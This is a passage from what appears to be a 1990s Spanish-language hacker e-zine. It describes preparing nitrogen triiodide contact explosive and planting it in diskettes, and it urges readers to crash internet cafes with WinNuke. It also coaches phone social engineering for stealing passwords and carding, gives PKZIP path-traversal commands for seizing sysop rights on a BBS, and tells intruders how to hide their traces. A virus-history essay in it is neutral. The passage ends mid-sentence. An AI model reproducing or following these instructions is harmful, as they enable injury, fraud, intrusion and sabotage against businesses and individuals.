Eso me emociono lo suficiente como para dormir pensando que al dia siguiente tendria sobre el filtro el tan deseado explosivo de contacto. Al dia siguiente me levante y el papel filtro estaba totalmente seco, el yodo se habia vuelto gris y era muy parecido a la polvora. En un delirio de estupidez se me ocurrio agarrar un poco de ese polvo, ponerlo sobre la mesa y usando cualquier cosa aplastarlo para divertirme viendo las chispas. Cuando iba metiendo la punta de un lapiz al centro del papel filtro donde habia quedado todo el yodo BUUUUMMMMM!!!! Todo el papel filtro se hizo pedazos !EN MIS MANOS! Hay GUEY me dolio la mano hasta el &$@!&$@! Mis oidos se quedaron en un zumbido por media hora y mi dedo meñique aun sigue sufriendo cuando trato de hacer cualquier cosa con el. AFORTUNADAMENTE solo era un gramo de yodo lo que exploto en mis manos :) Experiencia: Lo que aprendi fue simple, una vez seco el yodo NO SE TE OCURRA NI SIQUIERA TOCARLO! Es SSUUUPPPPEEEERRR sensible al movimiento. la idea que esto me dio es hacer unos 3 gramos de "yodo metalico" (cada uno en recipientes separados en caso de accidente) y cuando aun esten humedos por el amoniaco untarlos en la parte interna de un diskette y hacer lo descrito en mi ultimo articulo "Attack of the killer WareZ". Ah, otra cosa que me gustaria decir: El amoniaco es un liquido MUY VENENOSO! No abras el recipiente con el amoniaco en un cuarto sin ventilacion y tampoco se te ocurra inhalarlo. El yodo aun humedo NO ES EXPLOSIVO asi que en ese momento puedes meterlo en pequeñas bolsas de tela, periodico etc. Precios del Material: Yodo: 16 pesos el gramo Amoniaco: 8 pesos el recipiente Papel Filtro: 2.50 la hoja =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Los Bugientos de Microsoft ~~~~~~~~~~~~~~~~~~~~~~~~~~ El ultimo bug reportado sobre Microsoft Internet Explorer (el ultimo en esta hora, de seguro en una hora mas sale otro bug :=)) afecta a los usuarios de MSIE 3.x y 4.x que tengan PowerPoint en sus computadoras, que como saben viene con el MSOffice. Este "error" permite que un Website malefico (huy que mello) ejecute CUALQUIER programa en la computadora del usuario sin permiso, incluyendo aquellos comando para borar archivos y transferir informacion privada (Dios me perdone). Esto se deba a la "integracion" de MSIE y PowerPoint. Existen como 60 millones de usuarios de Office, segun Gillermin Portones (el de lentes). Esto quiere decir que los muchachitos de Microsoft no hacen su tarea o no aprenden o no se que ondas... Pero pensaria uno que harian una revision de toda la seguridad de su navegador... Lo que permite este "feature", llamado action settings, que es utilizado para crear presentaciones, es poder correr archivos ejecutables.MSIE permite acceso externo a este "feature" de PowerPoint Se espera un parche en microsoft.com. Dicen las malas lengua que si juntaramos en un solo lugar todos los patches de MSIE, se saturaria tanto el espacio, que Internet se colapsaria como en unos 3 segundos. Eso dicen.... @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ @ DUVAHAZARD @ Fluj0 D3 3n3R614 D161+4L @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ Este... pues... a peticion del publico.. UNO MAS de Microsoft! (siempre si fueron como 3 segundos JE!) Este bug hasta nombrecito tiene.. se llama Out of Band, que basicamente lo que hace es sacar a los usuarios de una red ya sea NT, Win95 o hasta DOS! Unos Hackers que hacian su trabajo descubrieron OTRO problema en Microsoft networking que permite un cierto tipo de transmision que se llama Out of Band, y que puede ser pasada a una maquina Windows, que a su vez causa un Kaos cuando la recibe, osea CraSh totAl! (que bonito). En respuesta, microsoft detuvo el Service Pack 3 de NT y hara un arreglito... Este bug que ha sido un temita bastante bueno en IRC, afecta cualquier computadora con un sistema operativo de Windows con capacidad para Redes. Esto quiere decir que maquinas con Windows, Windows NT - y hasta DOS - pueden caer victimas al problema si estan en una red. El programa que causa este problema ha estado flotando por IRC desde hace algun tiempo, y hay muchas variedades como WinNuke, Muerte, y Sinnerz - sin mencionar todos-los-faciles-de-hacer-scripts de Perl. Debido a que el sofware esta disponible los ataques son amplios. Los ataques como los que son creados por el Out of Band Request causan lo que se le llama un servicio denegado, donde un servidor recibe un friego de peticiones por archivos - lo cual no aguanta y no puede realizar. El programa trabaja haciendo una simple coneccion TCP/IP a la direccion IP utilizando el puerto Microsoft designado, 39. Despues de realizar la coneccion, el programa transmite informacion por la conexion usando una etiqueta llamada MSG_OBJ, que, en efecto, le comunica a Winsock que mande informacion Out of Band. La informacion enviada utilizando Out of Band no necesita ser algo especifico. Por ejemplo, WinNuke, envia la palabra "Bye!" Una vez que la informacion Out of Band es recivida, despues, esa maquina Windows detiene la comunicacion en la red completamente y de ahi la negacion de servicio a los usuarios que tratan de conectarse. [ Nota del editor: Los cafes que VENDEN el acceso a internet suelen usar a Windows NT como su sistema operativo por su falta de conocimiento para usar UNIX o LINUX. Ya saben, si quieren causar KaoZ a uno de estos cafes solo tienen que conseguir WinNuke, saber la direccion I.P. de su cafe local (por medio de email u otras formas ;-) y ponganlos fuera de negocio. WINUKE v4 lo pueden conseguir en nuestra pagina en la seccion de WareZ ] Sobres... Portense bien... @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ Nosotros controlamos la transmision... Punto. @ DUVAHAZARD @ http://www.dynamo.com.mx/DUVAHAZARD/ DuvaHazard@hotmail.com "FLuj0 D3 3n3r614 D161+4L" =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= EL FENOMENO VIRUS por Orion www.arrakis.es/~orion Definicion Un virus lo podemos definir, como un pequeño programa cuyo objetivo es perjudicar el funcionamiento de una computadora, por medio de las instrucciones con que fue programado. Podemos dar otra definicion de virus, aquella que los señala como un programa de ordenador capaz de replicar su codigo, de forma reiterada, en el soporte distinto al que ocupa inicialmente. Tal ha sido la evolucion de dichos virus en los ultimos años, que su numero aumenta vertiginosamente dia a dia, y se prevee que en el año 2000, podrian haber diez millones de virus en circulacion, y hasta hoy se conocen cerca de 3000 programas en el mundo con estas caracteristicas. Propiedades de los virus Ademas de la caracteristica principal de estos programas, que es su facultad de duplicacion, existen otros muchos caracteres de los virus, como son los siguientes: - Modifican el codigo ejecutable: Aqui aparece el adjetivo "contagio". Para que un virus contagie a otros programas ejecutables, debe ser capaz de alterar la organizacion del codigo del programa que va a infectar. - Permanecen en la memoria de nuestro ordenador: Cuando un usuario, inocente de las consecuencias, ejecuta en su ordenador un programa con virus, este pasa a acomodarse en la memoria RAM. Esto lo hace para adueñarse de la computadora, y por asi decirlo, tomar el mando. - Se ejecutan involuntariamente: Un virus sin ejecutar es imposible que dañe nuestra computadora. En ese momento esta en reposo, en modo de espera, necesitando de alguien que por equivocacion ejecute el programa "portador" (porque supongo que nadie ejecuta un virus en su ordenador intencionadamente). - Funcionan igual que cualquier programa: Un virus, al ser un programa de ordenador, se comporta como tal, a lo cual hay que dar gracias. Dicho programa necesita de alguien que lo ponga en funcionamiento, si no, es software inutil. - Es nocivo para el ordenador: Pero esto depende del virus con el que tratemos. Podemos encontrarnos programas que destruyen parcial o totalmente la informacion, o bien programas que tan solo concluyen en un mensaje continuo en pantalla, aunque al final muy molesto. - Se ocultan al usuario: Claramente, el programador del virus desea que el usuario no lo advierta durante el maximo tiempo posible, hasta que aparezca la señal de alarma en nuestro ordenador. Conforme pasa el tiempo, los virus van desarrollando mas y mejores tecnicas de ocultamiento, pero tambien se van desarrollando los programas antivirus y de localizacion. Origenes En el año 1949, fue Jonh Von Newman, denominado por muchos como el padre de la informatica, quien tras una serie de estudios reconocio la posible existencia de un codigo o programa que pudiera reproducirse continuamente. En Septiembre de 1984, fue Fred Cohen, quien expuso de forma publica el termino "virus de ordenador", como aquel software maligno con capacidad de reproduccion, tal y como definio Von Newman. Desarrollo del fenomeno virus En los ultimos años, el area informatica ha experimentado un vertiginoso crecimiento, y con esto, los programas que las compañias distribuyen, que cada vez alcanzan antes el periodo de madurez. Hace algunos años, los usuarios comenzaron a grabar los programas, debido al alto precio de los mismos, lo que llevo a los programadores de virus a encontrar el principal modo de distribucion. Podemos, por otro lado, enunciar otras fuentes de desarrollo de los virus como son las redes, el freeware y shareware, las BBS, y la aparicion de programas sencillos de creacion de virus. TIPOLOGIA Los virus que hasta ahora se han descubierto, se clasifican en base a lo siguiente: - Virus de sector de arranque - Virus de tabla de particion - Virus de fichero - Virus multipartes - Otros Virus de sector de arranque Se clasifican dentro de este apartado, aquellos virus que son capaces de variar o reemplazar el sector de arranque de un disco duro, como objetivo final del contagio. Dicho programa desplaza la version original del sector de arranque, llevando a la imposibilidad de sobreescritura en dicho sector alterado. Tales sectores se le apareceran al usuario como en mal estado o inutiles. Los virus de este tipo, se almacenan en la memoria RAM del ordenador, y se ejecutan cada vez que el usuario encienda el ordenador. Virus de tabla de particion Este tipo de virus, altera la oportunidad que el sistema operativo DOS nos da a cada usuario, de dividir el disco duro en partes, llamadas particiones. Resulta muy poco comun encontrar un virus de este tipo totalmente, pues para ello el mecanismo de infeccion de este se realizaria de tabla de particion de un disco duro, a tabla de particion de otro disco duro. Podria darse, en sistemas de redes locales, es decir, en sistemas de ordenadores ampliamente intercomunicados. Virus de fichero Los virus de fichero son capaces de modificar los ficheros con diversas extensiones(exe,bat,etc..). El contagio de un virus de este tipo hace engordar, por asi decirlo, el programa infectado, pues el virus pasa a formar parte de el. Cuando se ejecuta un programa contaminado, el virus toma el control y se instala, como siempre hemos visto que suele hacer, en la memoria RAM de la computadora. A partir de este momento, el virus esta completamente preparado para hacer de residente en un programa, e ir expandiendose poco a poco a los demas programas de nuestro ordenador. Virus multipartes Cuando los programadores de virus desean incrementar las caracteristicas expansivas y de contagio de un virus, aparecen en escena los llamados multipartitas. Estos virus son capaces de infectar cuatro posibles elementos: tabla de particion del disco duro, sector de arranque de disco duro, sector de arranque de disquete, y fichero ejecutable. Tambien llamados multipartes, estos "simpaticos", son capaces de contagiar dos o mas elementos de los que he nombrado anteriormente. Otros Aparte de los cuatro tipos de virus que he descrito hasta ahora, podemos diferenciar tres programas peligrosos, y como no, perniciosos para nuestro ordenador. estos son los siguientes: - Gusano: Podemos definir de esta manera a aquellos programas que se desplazan por la memoria de una manera independiente, es decir, sin tener que acogerse a otros programas como el virus. Cuando dicho gusano encuentra zonas de memoria desocupadas, las ocupa con el fin de poder realizar copias sucesivas de si mismo. En base a estos programas, podemos contar lo sucedido con referencia a la red. El "gusano de internet", fue un programa escrito por Robert Morris Jr. con 23 años, y liberado la noche del 2 de noviembre de 1988. Este programa era capaz de duplicarse por internet, y asi lo hizo; desafortunadamente, el gusano se paso de la raya y se multiplico incontrolablemente. En muy poco tiempo, la mayor parte de internet tuvo que ser cerrada, causando asi uno de los mayores trastornos informaticos de la historia. - Caballo de Troya: La caracteristica esencial de estos programas es la carencia del factor de autoreplica, ejecutandose su codigo maligno tan solo cuando se ejecuta el programa que lo porta(caballo de troya). De esta manera, es un programa creado para ofrecer al usuario una apariencia inofensiva, pero escondiendo un modulo capaz de destruir informacion. Hace algunos años, muchas empresas españolas, recibieron un disquete con informacion sobre el Sida, pero que incluia un caballo de troya que destruia datos. - Bomba Logica: Dichos programas se caracterizan por estar ocultos al usuario, en modo de espera, hasta que llega un plazo determinado, que es cuando se ejecutan. Hasta entonces, el usuario no notaba absolutamente nada extraño en su ordenador. El tipico ejemplo de estos programas es el "Viernes 13", que se ejecuta tal fecha, hasta lo cual, lo unico que hace es ocupar una pequeña porcion de memoria. TECNICAS DE OCULTAMIENTO La condicion de permanecer oculto al usuario, durante un cierto periodo de tiempo, mientras se realiza el mayor numero posible de copias, la llevan a cabo los virus mediante una serie de tecnicas de ocultamiento, que denominamos como tecnicas stealth. Cuanto mas precisas y avanzadas sean las tecnicas que utilice cada virus, mas tiempo permanecera escondido a los ojos del usuario. Normalmente, dichas tecnicas son programadas mediante dos procesos diferentes: - Intercepcion de interrupciones: Todas las aplicaciones que se ejecutan bajo DOS, utilizan una serie de interrupciones para comunicarse con el sistema operativo, y solicitar ciertas acciones necesarias del mismo. Si por cualquier causa un virus sustituye cualquier interrupcion, cualquier solicitud que cualquier programa haga de la misma, puede ser redireccionada por este, y asi llevar a cabo su funcion. - Encriptacion del codigo del virus: Dicha tecnica persigue que el virus aparezca diferente en cada una de las infecciones que lleve a cabo. De esta manera, dos infecciones de un virus que utiliza la encriptacion del codigo, solo seran iguales si utiliza la misma clave de encriptacion. La unica forma de deteccion comun es identificar el algoritmo de mutacion que ha realizado el virus. Las tecnicas mas interesantes de ocultamiento de los virus, son las tecnicas avanzadas, y por ello van a ser las tratadas a continuacion. Cabe destacar que los virus tambien pueden no tener tecnicas, o tenerlas basicas o medias. Principalmente, las tecnicas avanzadas constan de cuatro posibles acciones, que son las siguientes: - Localizacion de un antivirus: Existen virus residentes en memoria que analizan los diferentes programas, buscando programas antivirus. Si localizan alguno de ellos, el virus automaticamente desinfecta los ficheros infectados, y aparentemente sale de la memoria. De esta manera, el programa pernicioso enseña al usuario los ficheros tal y como estarian normalmente, sin su presencia. - Intercepcion de arranques en caliente: Las tecnicas avanzadas de un virus pueden incluso simular un arranque en caliente (llamamos asi al tipico ctrl-alt-supr), sin abandonar la memoria RAM. - Utilizacion de algoritmos de encriptacion: Esta tecnica de los virus persigue evitar la localizacion de signaturas que realizan los programas de deteccion de virus, cuando son ejecutados. - Grabacion aleatoria de rutinas no significativas: Los programadores expertos, usan dicha tecnica con las rutinas no significativas de los virus en su proceso de infeccion. SINTOMAS DE CONTAGIO Quiza las personas que hasta aqui han leido pensaran, ¿ pero como localizo un virus en mi ordenador si las tecnicas de ocultamiento son tan avanzadas ? A continuacion voy a exponer los sintomas mas caracteristicos de la infeccion de un virus: - Cambios en las caracteristicas de los ficheros ejecutables: Casi todos los virus de fichero, aumentan el tamaño de un fichero ejecutable cuando lo infectan. Tambien puede pasar, si el virus no ha sido programado por un experto, que cambien la fecha del fichero a la fecha de infeccion. - Aparicion de anomalias en el teclado: Existen algunos virus que definen ciertas teclas que al ser pulsadas, realizan acciones perniciosas en el ordenador. Tambien suele ser comun el cambio de la configuracion de las teclas, por la del pais donde se programo el virus. - Aparicion de anomalias en el video: Muchos de los virus eligen el sistema de video para notificar al usuario su presencia en el ordenador. Cualquier desajuste de la pantalla, o de los caracteres de esta nos puede notificar la presencia de un virus. - Se modifican el Autoexec.bat y el Config.sys: En ciertas ocasiones, los virus modifican dichos ficheros para adaptarlos a su presencia, al igual que las aplicaciones de software. - Reduccion del tamaño de la memoria RAM: Un virus, cuando entra en un ordenador, debe situarse obligatoriamente en la memoria RAM, y por ello ocupa una porcion de ella. Por tanto, el tamaño util operativo de la memoria se reduce en la misma cuantia que tiene el codigo del virus. - Desaparicion de datos: Esto es consecuencia de la accion destructiva para la que son creados casi todos los virus. Depende de la maldad del virus si se borran con la orden DEL, o mediante el uso de caracteres basura, lo que hace imposible su recuperacion. - El disco duro aparece con sectores en mal estado: Algunos virus usan sectores del disco para camuflarse, lo que hace que aparezcan como dañados o inoperativos. - Aparicion de mensajes de error inesperados: Lo mas normal, es que en ciertos virus, el sistema operativo produzca errores inusuales, cosa que debe alertar al usuario. - Reduccion del espacio disponible del disco: Ya que los virus se van duplicando de manera continua, es normal pensar que esta accion se lleve a cabo sobre ficheros del disco, lo que lleva a una disminucion del espacio disponible por el usuario. DETECCION DEL CONTAGIO Como muchos de los sintomas que he puesto anteriormente, pueden venir causados por defectos de Hardware, y no por un contagio de virus, te expongo a continuacion un pequeño truco para detectar la presencia de este. A veces nos creemos que un virus tiene la culpa de todo lo que nos pasa, y en cambio lo que debemos hacer es cambiarnos el disco duro, o alguna de las tarjetas que componen nuestro ordenador. El truco que puedes usar, aunque hay muchos, y que te tendra al corriente de la posible infeccion consiste en prepararle una trampa al virus, y es el siguiente: Consiste en usar un pequeño programa ejecutable, que se pondra como trampa al virus. El tamaño de dicho programa debe conocerse en todo momento, y ejecutandolo veremos si nuestro ordenador esta infectado o no. Para ello crearemos un fichero trampa con extension .COM de la siguiente manera: COPY CON ORION.COM <alt-144> <alt-205> <barra espaciadora> <F6> <intro> Las frases anteriores crean un pequeño fichero ejecutable llamado ORION, de mas o menos 3 bytes de tamaño. Para ver si tenemos virus en la memoria RAM, tendremos que ejecutar ORION.COM, y comparar su tamaño despues de ejecutado. En resumen, se debe hacer esto: ORION.COM DIR ORION.COM [ Si el archivo ejecutable ha cambiado de tamaño, seguramente tendremos un sistema infectado con algun virus. Pero, esta simple prueba no es 100% eficaz para detectar un virus, ya que algunos de estos miden el archivo a infectar y en caso de ser menor de, digamos, 100 bytes no lo infecta. ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ***** ING3NI3RA SOCIAL ****** ~~~~~~~~~~~~~~~~ Original de Carlos Truco - ¿QUE FREGADOS ES? ----------------- Supongo que muchos de ustedes, tendran por lo menos alguna idea de lo que es la ingeniera social, y lo util que es para el carding o el hacking. En muchos casos resulta un elemento indispensable, siendo una fuente de informacion basica para realizar estas actividades. Sin embargo habra mas de uno que a pesar de, usarlo a diario no conoce algunas tecnicas que le facilitaran esta labor. Asi pues, que fregados es la ingenieria social? La ingeniera social es basicamente la manipulacion de otra(s) persona(s) con el fin de obtener alguna informacion o cosa que dicha persona tiene, y que nos pudiera resultar util a nosotros. Ejemplos: Hacemos ingeniera social cuando le hacemos la barba a nuestro jefe por un aumento, o nos hacen ingeniera social cuando alguien nos llama por telefono y sucede algo parecido a esto: -Lamer : Bueno? -Alguien: Con el Sr. Fulanito por favor. -Lamer : El habla -Alguien: Hola (con una voz segura y de secretaria), llamo de la empresa X para decirle que ha sido agraciado con un viaje a Acapulco GRATIS! Notese que usa la palabra GRATIS que junto con NUEVO son las dos palabras del diccionario que influyen mas en la persona promedio. -Lamer : Pero como yo?, (pensando para si, que su suerte ha cambiando porque el jamas se habia ganado ni un pinche bolillo!) -Alguien: Pues si, y me da gusto invitarlo a un coctel a la hora X donde se le daran detalles. -Lamer : Bien alla estare ahi, gracias... -Alguien: Hasta luego... Pues bien esta historia termina con dos noticias para el lamer, una buena y otra mala, la buena: Que si habia viaje, la mala: tiene que comprar un departamento en Acapulco de sabe cuantos miles de dolares.... ya ni en pesos. A pesar de esto el vendedor habia cumplido su objetivo: Utilizando la ingeniera social llego a contactar a algunos posibles compradores de forma directa, y no gastando mas que unos cuantos refrescos en el coctel. Pues bien creo que con esta pequeña explicacion habra quedado claro lo que es la ingenieria social. Sin embargo en lo que resta de este texto espero darte algunas tecnicas que te pueden servir al estar hackeando o al realizar carding. -ANTES DE LLAMAR A NUESTRO OBJETIVO: ----------------------------------- La ingeniera social no es un proceso sencillo, y espontaneo, (a menos de que seas bien chido como orador y tengas la suficiente cabeza como para afrontar las muy variadas reacciones que puede presentar el que le llamas, sino pareceras un imbecil y el terminara preguntandote en lugar que tu a el) sino que requiere una gran cantidad de preparacion antes de ser usada. Dicha preparacion esta en relacion directa a la informacion que deseemos obtener. Entre mas informacion mas preparacion. Esa es una regla elemental que debes saber. Si quieres lograr tus objetivos deberas recordar esta tecnica. No importa cuan experimentado estes en la ingeniera social, el periodo previo a ella es elemental. Si por ejemplo sabes la lista de los usuarios de tu servidor de internet y quieres saber el password de algun login en particular, pues solo basta con llamarle, y parecer que sabes. La gente es muy tonta ante ciertas situaciones. Solo hay que aparentar que sabes. A un lamer le puedes salir con cualquier cosa estupida, pero siempre, SIEMPRE, hay que hacerle creer al lamer de nuestro gran conocimento sobre lo que hablamos. Sin embargo algunas veces a uno le toca mala suerte, y se llega a encontrar con un imbecil que sepa de lo que estas hablando, las cosas se complican, y tendras que ser mucho mas cuidadoso en lo que diras. Ahi es donde radica la esencia de mejor primero planear una llamada. No te puedes poner nervioso, porque la habras cagado. Si empiezas a parecer un niño ridiculo todo lo que hiciste y haras no servira de nada. Asi para prevenir estas eventualidades, lo mejor sera primero planear algun escrito o tener algun guion a seguir en la llamada. Ahi como se supondra, el guion debera contener no solamente lo esencial de la llamda, sino incluso una lista de las distintas preguntas que por tu culpa, posiblemente hara la persona a la que le llamamos. Por que por tu culpa?. Sencillamente tu culpa por que siempre deberas evitar que la otra persona pregunte, excepto en casos en que sea inevitable. Tu deberas preguntar no el otro. Recuerda bien esto y planea bien tu guion. El guion asi te funcionara como una herramienta elemental y si te sirve bien, te puede servir para otras circunstancias similares, como en el caso del carding. En algunos escritos encontraras que es una ayuda, yo no lo considero asi, sino la base de la ingeniera social en muchos casos. Otra cosa que sera necesaria muchas veces es un telefono donde pueda encontrarte la persona a la que llamas. Muchas veces son desconfiados por naturaleza, o simplemente siguen los pasos predeterminados en dichos procedimiento. Esta claro que algunas veces algunos entenderan lo que les estas diciendo, y no creen que sea seguro decir cosas por telefono (cosa bastante cierta). Claro esta que lo mas imbecil de tu parte seria darles el numero de telefono de tu casa. Terminaras metido en grandes pedos, por tu estupidez. Una opcion evidente es llamar de casa de algun conocido por ejemplo, aunque claro esta tendras que hacerlo bajo ciertas circunstancias que no pienso explicar aqui. Si se lo joden a el, pues ese ya es su pedo. Aunque no se lo vayas a hacer eso por ejemplo a tu vieja. Existen formas de hacerlo por un telefono publico, las cuales explicare en un numero posterior. Aun asi existen circunstancias, en las que no importara llamar de nuestra casa, porque a nadie le importara de donde llamaste. Eso ya depende de cada caso en particular. Ya por ultimo te voy a decir dos de los secretos basicos que te ayudaran, y haran que seas un maestro en esto de la ingeniera social: 1 - Mantener tu presencia y dominacion sobre la persona a la que le quieres hacer ingeniera social. Como dije antes lo mas importante durante la llamada sera mantener su status de 31337, por decirlo asi, su status de lider. Tendras que ingeniartelas para hacer al otro tu empleado, y tendras que ingeniartelas para que el otro te considere a ti como el jefe. Todas las personas se creeran todo si parece que sabes de lo que hablas. Asi acuerdate de esto: Siempre has que la otra persona creas que tu eres el fregon en el tema, que eres realmente el que sabes. Como dije TU sabes de lo que esta hablando, ellos no saben de lo que estas hablando. Siempre has que parezca que sabes lo que estas haciendo, porque si no lo haces la persona dudara. No puedes titubear ante nada, siempre permanece firme en lo que dices. Y como dije antes, has tu las preguntas, que el otro no te las haga a ti. 2- Otra cosa que ayuda muchas veces, es el ambiente que se recrea. Si se supone que hablas de una oficina debes de hacerle creer eso a la otra persona. Esta claro que por ejemplo un sonido de maquina de escribir ayuda. O una pequeña grabacion de una oficina que tengas por ahi, ayudaran a crear las condiciones mas propicias para la sugestion de la otra persona. Si se supone que trabajas de una oficina no vas a tener el sonido de las caricaturas que esta viendo tu carnal de 3 años, o de las palomas que truenan en el microondas, ni vas a escuchar a un vendedor gritando las porquerias que vende. Eso sencillamente no va. Sin embargo en algunas condiciones necesitaras por ejemplo que sea al aire libre. Eso ya te lo dejo a tu imaginacion. Si llamas de una oficina algunos sonidos propios de la computadora seran validos tambien. Es creible un beep de la computadora. Tambien seria valido un sonido de telefono que pudieras haber grabado previamente. En fin sera importante que consideres las tecnicas que te explicado, antes de hacer la ingeniera social. Piensa bien lo que diras, y como lo diras. Eso representa casi todo en la ingeniera social. Una cosa mas: Si puedes practica, haz tu voz creible, di las cosas de una forma perfecta. Y no se te olvide en el momento de llamar tu guion. Aunque te lo sepas de memoria, puede que se te olvide y todo la planeacion se habra ido abajo. Y sera muy dificil que se te pueda presentar la misma oportunidad, con la misma persona, casi imposible. - DURANTE LA LLAMADA ------------------ Ahora es el momento de la verdad. Aqui tendras que hacerlo todo a la perfeccion no podras fallar. He aqui los grandes consejos que tendras que tomar en cuenta cuando llames: 1 - NUNCA te pongas nervioso: Siempre manten la calma, no importando las condiciones y peligros a que te enfrentes. Esa es la cosa mas importante al llamar. Si la persona a la que llamaste no te quiso proporcionar la informacion que querias, nunca te desanimes. Probablemente te equivocaste en tu guion, y no fue el adecuado. Revisa tus palabras y planea uno mejor. Recuerda hacer uso de sonidos de fondo deacuerdo al ambiente que quieras recrear. Si a pesar de esto no te funciona, pues intentalo con otra persona. 2 - Si la otra persona comienza a hacer preguntas, y no las tienes planeadas, cuelga y llama mas tarde, probablemente tengas otras condiciones y se te facilite el trabajo. 3 - Sigue estos dos consejos y prepara bien las condiciones antes de llamada: tu guion a decir, con preguntas posibles, y un ambiente correcto, y estaras del otro lado. Si requieres informacion para el carding podras tener ya bien planeadas y estructuradas tus preguntas despues de varias veces. Sabras quien te dara informacion y quien no inclusive. - CONCLUSION ---------- En fin con esto termino mi punto de vista acerca de lo que es el carding y los distintos metodos utilizados para su realizacion. Podria dar una lista de la infinidad de sus usos y aplicaciones, pero creo que por hoy ya es suficiente sobre el tema. Asi que mejor las dejo a tu imaginacion. Espero haberlos iluminado. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Hackeando BBS's =--=--=--=--=--=--=--= Por: Khelbin Para: Phrack =--=--=--=--=--=--=--= Este hack no describe una falla en la seguridad de una BBS o su software sino en el tipo de archivador que este usando. Esta tecnica servira unicamente en sistemas usando PKZIP/PKUNZIP como el archivador y que este usandos flags especificas. Muchas BBS's descomprimen los archivos recien 'subidos' al disco e incluyen el flag -d y -o que crea los directorios que existen en el archivo zip y sobre-escribe los archivos existentes. Tomemos el ejemplo de una BBS usando Renegade con un setup standard: C:\RENEGADE\ C:\RENEGADE\TEMP\ C:\RENEGADE\DATA\ Supongamos que el archivo copiado a la BBS es copiado a C:\TEMP donde es descomprimido y revisado de virus. C:\RENEGADE\DATA\ es donde el archivo USERS.DAT esta guardado conteniendo toda la informacion de los usuarios. Lo que estamos a punto de aprender es a crear nuestro propio USERS.DAT en esa BBS y ponernos una cuenta con privilegios SYSOP. Primero necesitariamos preparar nuestro archivo ZIP de la siguiente forma: C:\>md tmp C:\>md c:\tmp\ddsdata C:\>copy c:\renegade\data\users.dat c:\tmp\ddsdata C:\>cd tmp C:\TMP>pkzip -pr evil.zip A continuacion, usando un editor hexadecimal editamos evil.zip. Debes cambiar todas las partes donde aparezca "ddsdata" en evil.zip a "../data" y asegurate que uses las diagonal correcta. Ahora cuando copies el archivo evil.zip sera descomprimido a "../data/users.dat" y el archivo users.dat tuyo sera el que sobre escriba al archivo original siempre y cuando la BBS descomprima los archivos usando el flag -od que es default en Renegade. Si creas el USERS.DAT usando una copia tuya de renegade puedes ser el sysop y poner el password que te guste mas :-). Muchas BBS's tienen esta vulnerabilidad pero el truco consiste en seguir las siguientes reglas: - Puedes moverte por los directorios unicamente si el nombre del archivo es de maximo 12 digitos (8 mas "." y la extension). - El archivo ZIP se corrompe cuando tratas de crear muchos directorios. La efectividad depende en que tan bien conoscas los directorios de una BBS pero puedes lograr sobre-escribir archivos en cualquier directorio sin tener que ser el USERS.DAT Si remueven el flag -o, el sistema aun es vulnerable si editando tu zip haces dos archivos con el mismo nombre. Esto "cuelga" el sistema cuando trata de sobre-escribir al otro archivo. El unico remedio es remover el flag -d a la hora de descomprimir los archivos y dejar el -o. =--=--=--=00=--=--=--= [ Esta tecnica de modificar los ZIPs es ilimitable en sus posibilidades ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- °°°°°°°°°°°°°°°°°°°°°°°°°°° ° Como cubrir tus Huellas ° ° ▀ ▀ ▀ ▀ ▀ ▀ ▀ ▀ ▀ ▀ ° °°°°°°°°°°°°°°°°°°°°°°°°°°° SEGUNDA PARTE: PRACTICA I. EL PRIMER COMANDO El primer comando que debes ejecutar despues de entrar a un sistema con una cuenta hackeada es cambiar de shell. El proposito es el evitar que los comandos que ejecutes terminen en el archivo .history Una revision de este archivo por el usuario real o el administrador revelaria tu presencia y lo que hiciste! Si estas ejecutando el shell CSH, entonces cambia a shell SH y vice versa. $ <- Prompt SH % <- prompt CSH Si no usan en el sistema los prompts standards, ejecuta SH. Si el prompt permanece igual escribe "exit" y ejecuta CSH ... II. ULTIMO TRABAJO CON LOS LOGS Si cuando entras a un sistema con una cuenta hackeada y aparece en tu pantalla un mensaje como "Last successful login from alpha.master.mil" significa que el usuario de esa cuenta es notificado desde donde entraron por ultima vez usando su cuenta. Para evadir este problema sin hackear root o no quieres borrar/editar archivos entonces ejecuta "rlogin <host>" y usa la misma cuenta para entrar al sistema de nuevo. despues escribe exit para regresar de nuevo a la primer entrada. Esto cambiara el texto avisando al usuario la proxima vez que entre un log asi <current host> o "localhost". III. EVASION DE WHO Despues de completar los pasos 1 y 2 escribe "w"...veras todos los usuarios actualmente en linea y tambien la direccion desde donde entraron. Si tu estas en Mexico y entras a un sistema americano, esto se vera muy sospechoso para los que usen "w". Para sobrepasar este error sin necesidad de ser root necesitas tan solo ejecutar "login" con el mismo username y password. Si ese sistema tiene el bug de las versiones recientes de unix, tu direccion origen sera modificada a "tty05". V. EJECUTAR PROGRAMAS No ejecutes programas con nombres sospechosos ... ISS y YPX son por ejemplo muy sospechosos y un administrador con un poco de cerebro notara algo raro cuando vea a un usuario ejecutando "loadmodule hack" en su Sun. Deberas copiar y renombrar los 